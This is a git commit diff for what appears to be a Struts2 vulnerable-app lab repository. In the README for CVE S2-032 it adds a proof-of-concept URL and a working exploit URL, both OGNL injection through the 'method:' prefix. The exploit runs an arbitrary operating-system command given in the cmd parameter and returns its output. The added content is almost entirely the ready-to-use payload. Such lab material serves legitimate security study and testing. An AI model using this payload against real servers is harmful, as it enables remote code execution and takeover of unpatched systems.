(Update Vul: Struts2) 更新 s2-032 PoC 与 Exp

2025-06-21 10:20:20 +00:00 · 2016-11-21 15:56:31 +08:00 · 2016-11-21 15:56:31 +08:00 · 473d00f015
commit 473d00f015
parent 27aa5dd614
1 changed files with 15 additions and 0 deletions
--- a/s/struts2/s2-032/README.md
+++ b/s/struts2/s2-032/README.md
@ -27,6 +27,21 @@ $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-032

 访问 `http://你的 IP 地址:端口号/`

+#### PoC
+
+```
+http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086
+```
+若页面显示：`1008660253718` 则代表可代码执行。
+
+####  Exp
+
+执行命令(所执行的命令在cmd参数处指定)：
+
+```
+http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id
+```
+
 ### 改动日志

 20160731